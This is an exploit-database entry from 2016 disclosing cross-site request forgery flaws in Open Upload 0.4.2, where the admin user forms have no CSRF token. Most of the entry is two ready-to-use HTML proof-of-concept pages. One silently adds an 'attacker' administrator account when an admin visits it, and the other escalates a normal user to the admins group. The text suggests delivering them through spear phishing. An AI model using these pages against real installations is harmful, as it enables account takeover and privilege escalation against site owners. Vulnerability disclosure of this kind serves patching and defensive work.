Open Upload 0.4.2 - Multiple Cross-Site Request Forgery Vulnerabilities

2016-07-27T00:00:00
ID 1337DAY-ID-25200
Type zdt
Reporter Vinesh Redkar
Modified 2016-07-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ================================================================================================================
Open Upload 0.4.2 Remote Admin Add CSRF Exploit and Changing Normal user permission
================================================================================================================
# Exploit Title     : Open Upload 0.4.2 Remote Admin Add CSRF Exploit
# Exploit Author    : Vinesh Redkar (@b0rn2pwn) 
# Email             : vineshredkar89[at]gmail[d0t]com
# Date: 21/07/2016
# Vendor Homepage: http://openupload.sourceforge.net/
# Software Link: https://sourceforge.net/projects/openupload/
# Version: 0.4.2
# Tested on: Windows 10 OS
  
Open Upload Application is vulnerable to CSRF attack (No CSRF token in place) meaning
that if an admin user can be tricked to visit a crafted URL created by
attacker (via spear phishing/social engineering).
 
Once exploited, the attacker can login as the admin using the username and the password he posted in the form.
 
======================CSRF POC (Adding New user with Admin Privileges)==================================
CSRF PoC Code
<html>
<head>
<title>Remote Admin Add CSRF Exploit</title>
</head>
<H2>Remote Admin Add CSRF Exploit by b0rn2pwn</H2>
  <body>
    <form action="http://127.0.0.1/openupload/index.php" method="POST">
      <input type="hidden" name="action" value="adminusers" />
      <input type="hidden" name="step" value="2" />
      <input type="hidden" name="adduserlogin" value="attacker" />
      <input type="hidden" name="adduserpassword" value="attacker" />
      <input type="hidden" name="adduserrepassword" value="attacker" />
      <input type="hidden" name="addusername" value="attacker" />
      <input type="hidden" name="adduseremail" value="attacker@gmail.com" />
      <input type="hidden" name="addusergroup" value="admins" />
      <input type="hidden" name="adduserlang" value="en" />
      <input type="hidden" name="adduseractive" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
======================CSRF POC (Changing privileges from normal user to administer)==================================
 
<html>
<head>
<title>Change privilege normal user to administer CSRF Exploit</title>
</head>
<H2>Change privilege normal user to administer CSRF Exploit by b0rn2pwn</H2>
  <body>
    <form action="http://127.0.0.1/openupload/index.php" method="POST">
      <input type="hidden" name="action" value="adminusers" />
      <input type="hidden" name="step" value="3" />
      <input type="hidden" name="login" value="normal user" />
      <input type="hidden" name="edituserpassword" value="" />
      <input type="hidden" name="edituserrepassword" value="" />
      <input type="hidden" name="editusername" value="normaluser" />
      <input type="hidden" name="edituseremail" value="normaluser@gmail.com" />
      <input type="hidden" name="editusergroup" value="admins" />
      <input type="hidden" name="edituserlang" value="en" />
      <input type="hidden" name="edituseractive" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

#  0day.today [2018-01-05]  #